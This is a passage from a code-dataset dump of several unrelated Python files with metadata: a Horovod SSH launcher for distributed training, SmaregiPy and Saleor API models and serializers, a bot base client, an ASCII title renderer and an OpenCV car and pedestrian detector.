(ssh_port, port))
hosts.append(host)
pools[pool_type].append(host)
is_chief = False
has_chief = "chief" in pools
if (env_config_json["task"]["type"] == "master" or
env_config_json["task"]["type"] == "chief"):
is_chief = True
if int(env_config_json["task"]["index"]) != 0:
raise ValueError("Only one master node is expected.")
elif ((not has_chief) and
(env_config_json["task"]["type"] == "worker") and
int(env_config_json["task"]["index"]) == 0):
is_chief = True
pools["chief"].append(pools["worker"].pop(0))
elif env_config_json["task"]["type"] != "worker":
raise ValueError("Unexpected task type for Horovod training: %s." %
env_config_json["task"]["type"])
return EnvironmentConfig(hosts=hosts, port=port, is_chief=is_chief,
pools=pools, job_id=job_id)
else:
return EnvironmentConfig(hosts=["localhost"], port=2222, is_chief=True,
pools={"chief": ["localhost"]}, job_id=job_id)
def start_ssh_server(port, is_chief):
ssh_server_command = [_SSHD_BINARY_PATH, "-p", str(port)]
if not is_chief:
ssh_server_command.append("-D")
completed = subprocess.call(ssh_server_command)
if completed != 0:
raise OSError("SSH server did not start successfully.")
def wait_for_ssh_servers(hosts, port, timeout_seconds):
deadline_datetime = datetime.datetime.utcnow() + datetime.timedelta(
seconds=timeout_seconds)
unavailable_hosts = []
while datetime.datetime.utcnow() < deadline_datetime:
unavailable_hosts = []
for host in hosts:
ssh_command = ["ssh", "-q", host, "-p", str(port), "true"]
result = subprocess.call(ssh_command)
if result != 0:
unavailable_hosts.append(host)
if not unavailable_hosts:
return
# Retry in 1 second.
time.sleep(1)
raise DeadlineExceededError(
"Timed out while waiting for all hosts to start. "
"Hosts still not available: %s. TASK_STARTUP_TIMEOUT_SECONDS=%d" %
(unavailable_hosts, timeout_seconds))
def run_horovod(env_config, jobs_per_host, args):
env = dict(os.environ)
del env["TF_CONFIG"]
num_jobs = len(env_config.hosts) * jobs_per_host
hosts = ",".join("%s:%d" % (h, jobs_per_host) for h in env_config.hosts)
horovod_command = [
"horovodrun", "--ssh-port", str(env_config.port), "-H",
hosts, "--num-proc", str(num_jobs)
]
horovod_command.extend(args)
exit_code = subprocess.call(horovod_command, env=env)
return exit_code
def benchmark_network(env_config):
if not env_config.pools["worker"]:
raise ValueError("No workers in the pool to do network benchmarking.")
iperf_server = ["iperf", "-s", "-p", "6000"]
server = subprocess.Popen(iperf_server)
# Wait 10 seconds for the local server to start.
time.sleep(10)
iperf_command = ["ssh", "-q", env_config.pools["worker"][0], "-p",
str(env_config.port),
"iperf", "-p", "6000", "-c", env_config.pools["chief"][0]]
subprocess.call(iperf_command)
server.kill()
def copy_files_recursively(src, dest):
if not dest.startswith("gs://"):
try:
os.makedirs(dest)
except OSError:
pass
copy_cmd = ["gsutil", "-m", "rsync", "-r", src, dest]
exit_code = subprocess.call(copy_cmd)
if exit_code != 0:
raise RuntimeError("Error while copying %s to %s" % (src, dest))
return exit_code
def main():
env_config_str = os.environ.get("TF_CONFIG")
job_id = os.environ.get("CLOUD_ML_JOB_ID", "localrun")
env_config = parse_environment_config(env_config_str, job_id)
print (env_config, env_config.pools, env_config.hosts, os.environ)
if os.environ.get("STAGE_GCS_PATH", False):
copy_files_recursively(
os.environ.get("STAGE_GCS_PATH"),
os.environ.get("STAGING_DIR", "/input"))
start_ssh_server(env_config.port, env_config.is_chief)
max_num_retries = os.environ.get("NUM_HOROVOD_RETRIES", 1)
if env_config.is_chief:
exit_code = 0
for retry in range(max_num_retries):
staging_timeout_seconds = int(
os.environ.get("TASK_STARTUP_TIMEOUT_SECONDS", 600))
wait_for_ssh_servers(env_config.hosts, env_config.port,
staging_timeout_seconds)
if os.environ.get("BENCHMARK_NETWORK", False):
benchmark_network(env_config)
num_gpus = _get_available_gpus()
# If there are no GPUs, we can just run single process per machine.
jobs_per_host = max(1, num_gpus)
args = sys.argv[1:]
exit_code = run_horovod(env_config=env_config, jobs_per_host=jobs_per_host,
args=args)
if exit_code == 0:
break
else:
print ("Retrying...", retry, "out of", max_num_retries)
if os.environ.get("GCS_OUTPUT_PATH", False):
copy_files_recursively(
os.environ.get("OUTPUT_DIR", "/output"),
os.path.join(os.environ.get("GCS_OUTPUT_PATH"), job_id))
sys.exit(exit_code)
if __name__ == "__main__":
main() | en | 0.909135 | Indicates an action took too long. # This is imported here so that we don't load tensorflow in the parent # process. Once the sub-process exits, it releases its allocated GPU memory. Returns the number of GPUs on the machine. Parses environment config and returns a list of hosts as well as the role. Returns: An EnvironmentConfig. # Retry in 1 second. # Wait 10 seconds for the local server to start. # If there are no GPUs, we can just run single process per machine. | 2.479089 | 2 |
smaregipy/pos/customer_groups.py | shabaraba/SmaregiPy | 0 | 9195 | import datetime
from pydantic import Field
from typing import (
ClassVar,
List,
Dict,
Optional,
)
from smaregipy.base_api import (
BaseServiceRecordApi,
BaseServiceCollectionApi,
)
from smaregipy.utils import NoData, DictUtil
class CustomerGroup(BaseServiceRecordApi):
RECORD_NAME = 'customer_groups'
ID_PROPERTY_NAME: ClassVar[str] = 'customer_group_id'
REQUEST_EXCLUDE_KEY: ClassVar[List[str]] = ['customer_group_id']
customer_group_id: Optional[int] = Field(default_factory=NoData)
customer_group_section_id: Optional[int] = Field(default_factory=NoData)
label: Optional[str] = Field(default_factory=NoData)
display_flag: Optional[bool] = Field(default_factory=NoData)
display_sequence: Optional[int] = Field(default_factory=NoData)
ins_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
upd_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
class CustomerGroupCollection(BaseServiceCollectionApi[CustomerGroup]):
RECORD_NAME = 'customer_groups'
COLLECT_MODEL = CustomerGroup
WITH: ClassVar[List[str]] = []
class CustomerGroupSection(BaseServiceRecordApi):
RECORD_NAME = 'customer_group_sections'
ID_PROPERTY_NAME: ClassVar[str] = 'customer_group_section_id'
REQUEST_EXCLUDE_KEY: ClassVar[List[str]] = ['customer_group_section_id']
customer_group_section_id: Optional[int] = Field(default_factory=NoData)
customer_group_section_label: Optional[str] = Field(default_factory=NoData)
ins_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
upd_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
async def save(self: 'CustomerGroupSection') -> 'CustomerGroupSection':
"""
客層セクションの更新を行います。
put処理のため、saveメソッドをオーバーライド
"""
uri = self._get_uri(self._path_params)
header = self._get_header()
response = self._api_put(uri, header, self.to_api_request_body())
response_data: Dict = DictUtil.convert_key_to_snake(response[self.Response.KEY_DATA])
response_model = self.__class__(**response_data)
self.copy_all_fields(response_model)
self.id(getattr(self, self.ID_PROPERTY_NAME))
self._status=self.DataStatus.SAVED
return self
class CustomerGroupSectionCollection(BaseServiceCollectionApi[CustomerGroupSection]):
RECORD_NAME = 'customer_group_sections'
COLLECT_MODEL = CustomerGroupSection
WITH: ClassVar[List[str]] = []
| import datetime
from pydantic import Field
from typing import (
ClassVar,
List,
Dict,
Optional,
)
from smaregipy.base_api import (
BaseServiceRecordApi,
BaseServiceCollectionApi,
)
from smaregipy.utils import NoData, DictUtil
class CustomerGroup(BaseServiceRecordApi):
RECORD_NAME = 'customer_groups'
ID_PROPERTY_NAME: ClassVar[str] = 'customer_group_id'
REQUEST_EXCLUDE_KEY: ClassVar[List[str]] = ['customer_group_id']
customer_group_id: Optional[int] = Field(default_factory=NoData)
customer_group_section_id: Optional[int] = Field(default_factory=NoData)
label: Optional[str] = Field(default_factory=NoData)
display_flag: Optional[bool] = Field(default_factory=NoData)
display_sequence: Optional[int] = Field(default_factory=NoData)
ins_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
upd_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
class CustomerGroupCollection(BaseServiceCollectionApi[CustomerGroup]):
RECORD_NAME = 'customer_groups'
COLLECT_MODEL = CustomerGroup
WITH: ClassVar[List[str]] = []
class CustomerGroupSection(BaseServiceRecordApi):
RECORD_NAME = 'customer_group_sections'
ID_PROPERTY_NAME: ClassVar[str] = 'customer_group_section_id'
REQUEST_EXCLUDE_KEY: ClassVar[List[str]] = ['customer_group_section_id']
customer_group_section_id: Optional[int] = Field(default_factory=NoData)
customer_group_section_label: Optional[str] = Field(default_factory=NoData)
ins_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
upd_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
async def save(self: 'CustomerGroupSection') -> 'CustomerGroupSection':
"""
客層セクションの更新を行います。
put処理のため、saveメソッドをオーバーライド
"""
uri = self._get_uri(self._path_params)
header = self._get_header()
response = self._api_put(uri, header, self.to_api_request_body())
response_data: Dict = DictUtil.convert_key_to_snake(response[self.Response.KEY_DATA])
response_model = self.__class__(**response_data)
self.copy_all_fields(response_model)
self.id(getattr(self, self.ID_PROPERTY_NAME))
self._status=self.DataStatus.SAVED
return self
class CustomerGroupSectionCollection(BaseServiceCollectionApi[CustomerGroupSection]):
RECORD_NAME = 'customer_group_sections'
COLLECT_MODEL = CustomerGroupSection
WITH: ClassVar[List[str]] = []
| ja | 0.999934 | 客層セクションの更新を行います。 put処理のため、saveメソッドをオーバーライド | 2.308725 | 2 |
StickyDJ-Bot/src/clients/client.py | JCab09/StickyDJ-Bot | 0 | 9196 | #!/usr/bin/env python3
"""
Base-Client Class
This is the parent-class of all client-classes and holds properties and functions they all depend on.
Author: <NAME>
"""
import src.util.debugger as Debugger
import src.util.configmaker as configmaker
class BaseClient(object):
"""Base-Client Class"""
def __init__(self, configpath, configtype, debugFlag = False):
self._Debug = Debugger.Debugger(debugFlag)
self._Debug.write("INIT BaseClient")
defaultPrompt = "-"
self._prompt = defaultPrompt
self._clientConfig = configmaker.getConfig(configpath, configtype)
self._Debug.write("INIT_END BaseClient")
@property
def prompt(self):
return self._prompt
def get_client_configuration():
"""Base Class for getting client configuration"""
def load_client_configuration():
"""Base Class for loading client configuration into memory"""
| #!/usr/bin/env python3
"""
Base-Client Class
This is the parent-class of all client-classes and holds properties and functions they all depend on.
Author: <NAME>
"""
import src.util.debugger as Debugger
import src.util.configmaker as configmaker
class BaseClient(object):
"""Base-Client Class"""
def __init__(self, configpath, configtype, debugFlag = False):
self._Debug = Debugger.Debugger(debugFlag)
self._Debug.write("INIT BaseClient")
defaultPrompt = "-"
self._prompt = defaultPrompt
self._clientConfig = configmaker.getConfig(configpath, configtype)
self._Debug.write("INIT_END BaseClient")
@property
def prompt(self):
return self._prompt
def get_client_configuration():
"""Base Class for getting client configuration"""
def load_client_configuration():
"""Base Class for loading client configuration into memory"""
| en | 0.819947 | #!/usr/bin/env python3 Base-Client Class This is the parent-class of all client-classes and holds properties and functions they all depend on. Author: <NAME> Base-Client Class Base Class for getting client configuration Base Class for loading client configuration into memory | 3.109398 | 3 |
cryptomon/ascii.py | S0L1DUS/cryptocoinmon | 0 | 9197 | # -*- coding: utf-8 -*-
import sys
from cryptomon.common import Colors
if sys.version_info >= (3, 0):
import io
else:
import StringIO as io
ascii_title = """
/$$$$$$ /$$ /$$ /$$
/$$__ $$ | $$ | $$$ /$$$
| $$ \__/ /$$$$$$ /$$ /$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$$$ /$$$$ /$$$$$$ /$$$$$$$
| $$ /$$__ $$| $$ | $$ /$$__ $$|_ $$_/ /$$__ $$| $$ $$/$$ $$ /$$__ $$| $$__ $$
| $$ | $$ \__/| $$ | $$| $$ \ $$ | $$ | $$ \ $$| $$ $$$| $$| $$ \ $$| $$ \ $$
| $$ $$| $$ | $$ | $$| $$ | $$ | $$ /$$| $$ | $$| $$\ $ | $$| $$ | $$| $$ | $$
| $$$$$$/| $$ | $$$$$$$| $$$$$$$/ | $$$$/| $$$$$$/| $$ \/ | $$| $$$$$$/| $$ | $$
\______/ |__/ \____ $$| $$____/ \___/ \______/ |__/ |__/ \______/ |__/ |__/
/$$ | $$| $$
| $$$$$$/| $$
\______/ |__/
"""
def process_title(title):
buf = io.StringIO(title)
lines = buf.readlines()
lines = lines[1:-1]
colored_lines = []
colored_title = ""
for line in lines:
colored_lines.append(Colors.BLUE + line[:13] + Colors.YELLOW + line[14:])
for line in colored_lines:
colored_title += line
return colored_title + Colors.ENDLINE
| # -*- coding: utf-8 -*-
import sys
from cryptomon.common import Colors
if sys.version_info >= (3, 0):
import io
else:
import StringIO as io
ascii_title = """
/$$$$$$ /$$ /$$ /$$
/$$__ $$ | $$ | $$$ /$$$
| $$ \__/ /$$$$$$ /$$ /$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$$$ /$$$$ /$$$$$$ /$$$$$$$
| $$ /$$__ $$| $$ | $$ /$$__ $$|_ $$_/ /$$__ $$| $$ $$/$$ $$ /$$__ $$| $$__ $$
| $$ | $$ \__/| $$ | $$| $$ \ $$ | $$ | $$ \ $$| $$ $$$| $$| $$ \ $$| $$ \ $$
| $$ $$| $$ | $$ | $$| $$ | $$ | $$ /$$| $$ | $$| $$\ $ | $$| $$ | $$| $$ | $$
| $$$$$$/| $$ | $$$$$$$| $$$$$$$/ | $$$$/| $$$$$$/| $$ \/ | $$| $$$$$$/| $$ | $$
\______/ |__/ \____ $$| $$____/ \___/ \______/ |__/ |__/ \______/ |__/ |__/
/$$ | $$| $$
| $$$$$$/| $$
\______/ |__/
"""
def process_title(title):
buf = io.StringIO(title)
lines = buf.readlines()
lines = lines[1:-1]
colored_lines = []
colored_title = ""
for line in lines:
colored_lines.append(Colors.BLUE + line[:13] + Colors.YELLOW + line[14:])
for line in colored_lines:
colored_title += line
return colored_title + Colors.ENDLINE
| en | 0.523504 | # -*- coding: utf-8 -*- /$$$$$$ /$$ /$$ /$$ /$$__ $$ | $$ | $$$ /$$$ | $$ \__/ /$$$$$$ /$$ /$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$$$ /$$$$ /$$$$$$ /$$$$$$$ | $$ /$$__ $$| $$ | $$ /$$__ $$|_ $$_/ /$$__ $$| $$ $$/$$ $$ /$$__ $$| $$__ $$ | $$ | $$ \__/| $$ | $$| $$ \ $$ | $$ | $$ \ $$| $$ $$$| $$| $$ \ $$| $$ \ $$ | $$ $$| $$ | $$ | $$| $$ | $$ | $$ /$$| $$ | $$| $$\ $ | $$| $$ | $$| $$ | $$ | $$$$$$/| $$ | $$$$$$$| $$$$$$$/ | $$$$/| $$$$$$/| $$ \/ | $$| $$$$$$/| $$ | $$ \______/ |__/ \____ $$| $$____/ \___/ \______/ |__/ |__/ \______/ |__/ |__/ /$$ | $$| $$ | $$$$$$/| $$ \______/ |__/ | 2.460153 | 2 |
car & pedestrian_tracker.py | Ishita-2001/Car-And-Pedestrian-prediction | 1 | 9198 | import cv2
video=cv2.VideoCapture(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\pedestrian.mp4')
#pre trained pedestrian and car classifier
car_tracker_file=(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\car.xml')
pedestrian_tracker_file=(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\pedestrian.xml')
#create car n pedestrian classifier
car_tracker=cv2.CascadeClassifier(car_tracker_file)
pedestrian_tracker=cv2.CascadeClassifier(pedestrian_tracker_file)
#run forever untill car stop
while True:
(read_successful,frame)=video.read()
gr_frame=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
#detect cars n pedestrian
cars=car_tracker.detectMultiScale(gr_frame)
pedestrians=pedestrian_tracker.detectMultiScale(gr_frame)
#draw rectangle around cars
for(x,y,w,h) in cars:
cv2.rectangle(frame,(x+1,y+2),(x+w,y+h),(255,0,0),2)
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,0,255),2)
#draw rectangle around pedestrian
for(x,y,w,h) in pedestrians:
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,255),2)
#display
cv2.imshow('car n pedestrians',frame)
key = cv2.waitKey(1)
#stopping condition
if key == 83 or key== 115:
break
# release the VideoCapture object
video.release()
print('Press "s" to stop')
print('Hey!')
| import cv2
video=cv2.VideoCapture(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\pedestrian.mp4')
#pre trained pedestrian and car classifier
car_tracker_file=(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\car.xml')
pedestrian_tracker_file=(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\pedestrian.xml')
#create car n pedestrian classifier
car_tracker=cv2.CascadeClassifier(car_tracker_file)
pedestrian_tracker=cv2.CascadeClassifier(pedestrian_tracker_file)
#run forever untill car stop
while True:
(read_successful,frame)=video.read()
gr_frame=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
#detect cars n pedestrian
cars=car_tracker.detectMultiScale(gr_frame)
pedestrians=pedestrian_tracker.detectMultiScale(gr_frame)
#draw rectangle around cars
for(x,y,w,h) in cars:
cv2.rectangle(frame,(x+1,y+2),(x+w,y+h),(255,0,0),2)
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,0,255),2)
#draw rectangle around pedestrian
for(x,y,w,h) in pedestrians:
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,255),2)
#display
cv2.imshow('car n pedestrians',frame)
key = cv2.waitKey(1)
#stopping condition
if key == 83 or key== 115:
break
# release the VideoCapture object
video.release()
print('Press "s" to stop')
print('Hey!')
| en | 0.760304 | #pre trained pedestrian and car classifier #create car n pedestrian classifier #run forever untill car stop #detect cars n pedestrian #draw rectangle around cars #draw rectangle around pedestrian #display #stopping condition # release the VideoCapture object | 3.229544 | 3 |
saleor/wing/api/serializers.py | glosoftgroup/tenants | 1 | 9199 | <filename>saleor/wing/api/serializers.py<gh_stars>1-10
# site settings rest api serializers
from rest_framework import serializers
from saleor.wing.models import Wing as Table
class TableListSerializer(serializers.ModelSerializer):
update_url = serializers.HyperlinkedIdentityField(view_name='wing:api-update')
delete_url = serializers.HyperlinkedIdentityField(view_name='wing:api-delete')
text = serializers.SerializerMethodField()
class Meta:
model = Table
fields = ('id',
'name',
'text',
'description',
'update_url',
'delete_url'
)
def get_text(self, obj):
try:
return obj.name
except:
return ''
class CreateListSerializer(serializers.ModelSerializer):
class Meta:
model = Table
fields = ('id',
'name',
'description',
)
def create(self, validated_data):
instance = Table()
instance.name = validated_data.get('name')
if validated_data.get('description'):
instance.description = validated_data.get('description')
instance.save()
return instance
class UpdateSerializer(serializers.ModelSerializer):
class Meta:
model = Table
fields = ('id',
'name',
'description',
)
def update(self, instance, validated_data):
instance.name = validated_data.get('name', instance.name)
instance.description = validated_data.get('description', instance.description)
instance.save()
return instance
| <filename>saleor/wing/api/serializers.py<gh_stars>1-10
# site settings rest api serializers
from rest_framework import serializers
from saleor.wing.models import Wing as Table
class TableListSerializer(serializers.ModelSerializer):
update_url = serializers.HyperlinkedIdentityField(view_name='wing:api-update')
delete_url = serializers.HyperlinkedIdentityField(view_name='wing:api-delete')
text = serializers.SerializerMethodField()
class Meta:
model = Table
fields = ('id',
'name',
'text',
'description',
'update_url',
'delete_url'
)
def get_text(self, obj):
try:
return obj.name
except:
return ''
class CreateListSerializer(serializers.ModelSerializer):
class Meta:
model = Table
fields = ('id',
'name',
'description',
)
def create(self, validated_data):
instance = Table()
instance.name = validated_data.get('name')
if validated_data.get('description'):
instance.description = validated_data.get('description')
instance.save()
return instance
class UpdateSerializer(serializers.ModelSerializer):
class Meta:
model = Table
fields = ('id',
'name',
'description',
)
def update(self, instance, validated_data):
instance.name = validated_data.get('name', instance.name)
instance.description = validated_data.get('description', instance.description)
instance.save()
return instance
| en | 0.407684 | # site settings rest api serializers | 2.36331 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.